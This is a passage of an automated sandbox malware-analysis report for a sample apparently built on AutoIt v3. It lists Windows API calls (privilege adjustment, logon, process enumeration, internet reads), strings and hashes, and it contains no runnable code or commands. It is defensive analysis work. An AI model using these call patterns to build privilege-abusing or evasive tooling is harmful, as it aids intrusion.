                                                  • Instruction ID: c82d2d6e7f514097d7f649a6be54df6423a9b8cdb867e1ebca06e8e47ae84b2f
                                                  • Opcode Fuzzy Hash: dd9fd9e3a768db7aa142b6cd34c28a193eae7ce10e9c3c6150a5e18e9e3a4930
                                                  • Instruction Fuzzy Hash: 7811C4317009156FDB216F26DC84B6E7B9CFF447A1B408029F95ED7261CBF0DD428AA0
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C480C0
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C480CA
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C480D9
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C480E0
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C480F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: b5dc5c9173a1c4f8deefe425aee7475322d36495de5fe58d4df09b4d0bbd863f
                                                  • Instruction ID: b4914d4ebdf77f47e62cf104aff82f84ea667fed02bdcaee076abff77c19e726
                                                  • Opcode Fuzzy Hash: b5dc5c9173a1c4f8deefe425aee7475322d36495de5fe58d4df09b4d0bbd863f
                                                  • Instruction Fuzzy Hash: 35F04F31240204AFEB101FA5ECCDF6F3BACFF4A755F40002AF959C6150CA619D86EA60
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C5C432
                                                  • CoCreateInstance.OLE32(00C82D6C,00000000,00000001,00C82BDC,?), ref: 00C5C44A
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • CoUninitialize.OLE32 ref: 00C5C6B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: db1e47f62d4b00243a5e063412be93a8d5e7d69fb50e5df5c5e96f1a47c50c8f
                                                  • Instruction ID: 39435332b8f7f12c9b0bdecca2cfacf6366e2361c8a2710fa91096c19fdde934
                                                  • Opcode Fuzzy Hash: db1e47f62d4b00243a5e063412be93a8d5e7d69fb50e5df5c5e96f1a47c50c8f
                                                  • Instruction Fuzzy Hash: E1A129B1104209AFD700EF64C881EBFB7E8EF85354F00496DF6559B1A2DB71EA49CB62
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BF4AD0), ref: 00BF4B45
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BF4B57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: ebb54e6cb694e6738710134a4854729f90bd8bfe360ce2ed6e2f97074f01fa75
                                                  • Instruction ID: 01ac56d719db8e72047a9e46fe8443267c8b6d52c1381f046aa8da6c11518c91
                                                  • Opcode Fuzzy Hash: ebb54e6cb694e6738710134a4854729f90bd8bfe360ce2ed6e2f97074f01fa75
                                                  • Instruction Fuzzy Hash: 5DD01735A10717CFD7209F32E8A8B1A76E4AF05391F11C8BE948AD6151E770E8C1CA58
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: f9b04a61d21b0150e535469c8eea463d7bacbdad86498a6442b08068c64b440d
                                                  • Instruction ID: dd0d5bd9a13564f104d4d269b4a1e62347047970078732eb70ca217ab46e15d3
                                                  • Opcode Fuzzy Hash: f9b04a61d21b0150e535469c8eea463d7bacbdad86498a6442b08068c64b440d
                                                  • Instruction Fuzzy Hash: BE2290716083409FC724DF64C881B6FB7E8BF85710F10891DF59A9B291DB71EA49CB92
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C6EE3D
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C6EE4B
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C6EF0B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C6EF1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: 83a32e8b3dcf5d395d1e352b6d1cdbbce961dd7390d1d709cfd254336e62b270
                                                  • Instruction ID: d49b1ed47083657816432bcbc2275a9423715290806261b266759905c5c35611
                                                  • Opcode Fuzzy Hash: 83a32e8b3dcf5d395d1e352b6d1cdbbce961dd7390d1d709cfd254336e62b270
                                                  • Instruction Fuzzy Hash: AA518D71104704AFD320EF24DC85F6BB7E8EF94750F40486DF695972A1EB70A909CB92
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C4E628
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 5b3c10622eb53a12bd67b2f4c2ddd6e67226cf7cd2e25c6b755f205222477712
                                                  • Instruction ID: a505d3fff6e033882bf25ba68cdf5a499815bf946a920a17d2de1f2132cce40e
                                                  • Opcode Fuzzy Hash: 5b3c10622eb53a12bd67b2f4c2ddd6e67226cf7cd2e25c6b755f205222477712
                                                  • Instruction Fuzzy Hash: 77322775A007059FDB28DF19C4819AAB7F1FF48320B16C56EE8AADB3A1D770E941CB44
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C6180A,00000000), ref: 00C623E1
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C62418
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: bb496459dcb19781984085cb5c2c7ecb96778b04638b3e2601639690bc157a3d
                                                  • Instruction ID: a0b73ac1f2231f32d37f4b27f6ac79daf7740eade0e3fdbceb1abc926ce5c2e3
                                                  • Opcode Fuzzy Hash: bb496459dcb19781984085cb5c2c7ecb96778b04638b3e2601639690bc157a3d
                                                  • Instruction Fuzzy Hash: D241D471904A09BFEB30DE95DCC5FFBB7ACEB40324F10406AF655A6250EB749E81A660
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5B40B
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C5B465
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C5B4B2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  APIs
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C48858
                                                  • GetLastError.KERNEL32 ref: 00C48865
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C48774
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C4878B
                                                  • FreeSid.ADVAPI32(?), ref: 00C4879B
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C5C6FB
                                                  • FindClose.KERNEL32(00000000), ref: 00C5C72B
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C69468,?,00C7FB84,?), ref: 00C5A097
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C69468,?,00C7FB84,?), ref: 00C5A0A9
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48309), ref: 00C481E0
                                                  • CloseHandle.KERNEL32(?,?,00C48309), ref: 00C481F2
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C18D57,?,?,?,00000001), ref: 00C1A15A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C1A163
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  APIs
                                                  • __time64.LIBCMT ref: 00C5889B
                                                    • Part of subcall function 00C1520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C58F6E,00000000,?,?,?,?,00C5911F,00000000,?), ref: 00C15213
                                                    • Part of subcall function 00C1520A: __aulldiv.LIBCMT ref: 00C15233
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  APIs
                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C54C76
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C48389), ref: 00C487D1
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C1A12A
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 0e04ff742fbe81e9352e0789d648f5b5ce6a569c831e100f094620b2aeb02042
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: 96C199362050930ADF2E563A94750BEFAA15EA37B131E075DD8B3CB1D4EE24CAB5F610
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 38d65cb4edbd306fe813fcce5158eec481beac659501af71f4bf285921fcfa43
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 76C1B7372051930ADF2E563AD4350BEBAA15EA37B131E075DD8B2DB0D4EE14CAB4F620
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: ab0873d0feaa3d69935327e94dd03d35b44bd2f04d2b5f79f4de2bcbec49c59b
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 12C1A73220909309DF2E563AD4351BEBAA15EA37B131E075DDDB3CB1C4EE18CAB5E650
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00C6785B
                                                  • DeleteObject.GDI32(00000000), ref: 00C6786D
                                                  • DestroyWindow.USER32 ref: 00C6787B
                                                  • GetDesktopWindow.USER32 ref: 00C67895
                                                  • GetWindowRect.USER32(00000000), ref: 00C6789C
                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C679DD
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C679ED
                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67A35
                                                  • GetClientRect.USER32(00000000,?), ref: 00C67A41
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C67A7B
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67A9D
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67AB0
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67ABB
                                                  • GlobalLock.KERNEL32(00000000), ref: 00C67AC4
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67AD3
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00C67ADC
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67AE3
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C67AEE
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67B00
                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00C82CAC,00000000), ref: 00C67B16
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C67B26
                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C67B4C
                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C67B6B
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67B8D
                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67D7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                  • API String ID: 2211948467-2373415609
                                                  • Opcode ID: f22e5c8ff269d1954ae5d13fffc05d1824a87e90b801f7264f1bd4d14200fb4f
                                                  • Instruction ID: 852eba73ad478fd816ac99bc3e849c426eb806a18aa10a464190709dc8dd8033
                                                  • Opcode Fuzzy Hash: f22e5c8ff269d1954ae5d13fffc05d1824a87e90b801f7264f1bd4d14200fb4f
                                                  • Instruction Fuzzy Hash: 00025C75900119EFDB14DFA4DC89FAE7BB9EF48314F148668F915AB2A1C7309D42CB60
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00C7F910), ref: 00C73627
                                                  • IsWindowVisible.USER32(?), ref: 00C7364B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: f72c6a1a44438aa419cf98affbc40682ad34fcf8ee85983c90e10ba2d30406d5
                                                  • Instruction ID: 05cbfa57faa6be4c29c6a3b1b4892c26ae4ee3d5fc7bde61af2ce4711016a3bc
                                                  • Opcode Fuzzy Hash: f72c6a1a44438aa419cf98affbc40682ad34fcf8ee85983c90e10ba2d30406d5
                                                  • Instruction Fuzzy Hash: 05D1A1702043419BCB04EF10C456AAE77E1EF96394F148458F89A5B3E2DB71EE8AFB51
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C7A630
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C7A661
                                                  • GetSysColor.USER32(0000000F), ref: 00C7A66D
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00C7A687
                                                  • SelectObject.GDI32(?,00000000), ref: 00C7A696
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C7A6C1
                                                  • GetSysColor.USER32(00000010), ref: 00C7A6C9
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00C7A6D0
                                                  • FrameRect.USER32(?,?,00000000), ref: 00C7A6DF
                                                  • DeleteObject.GDI32(00000000), ref: 00C7A6E6
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00C7A731
                                                  • FillRect.USER32(?,?,00000000), ref: 00C7A763
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7A78E
                                                    • Part of subcall function 00C7A8CA: GetSysColor.USER32(00000012), ref: 00C7A903
                                                    • Part of subcall function 00C7A8CA: SetTextColor.GDI32(?,?), ref: 00C7A907
                                                    • Part of subcall function 00C7A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C7A91D
                                                    • Part of subcall function 00C7A8CA: GetSysColor.USER32(0000000F), ref: 00C7A928
                                                    • Part of subcall function 00C7A8CA: GetSysColor.USER32(00000011), ref: 00C7A945
                                                    • Part of subcall function 00C7A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7A953
                                                    • Part of subcall function 00C7A8CA: SelectObject.GDI32(?,00000000), ref: 00C7A964
                                                    • Part of subcall function 00C7A8CA: SetBkColor.GDI32(?,00000000), ref: 00C7A96D
                                                    • Part of subcall function 00C7A8CA: SelectObject.GDI32(?,?), ref: 00C7A97A
                                                    • Part of subcall function 00C7A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C7A999
                                                    • Part of subcall function 00C7A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7A9B0
                                                    • Part of subcall function 00C7A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C7A9C5
                                                    • Part of subcall function 00C7A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7A9ED
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
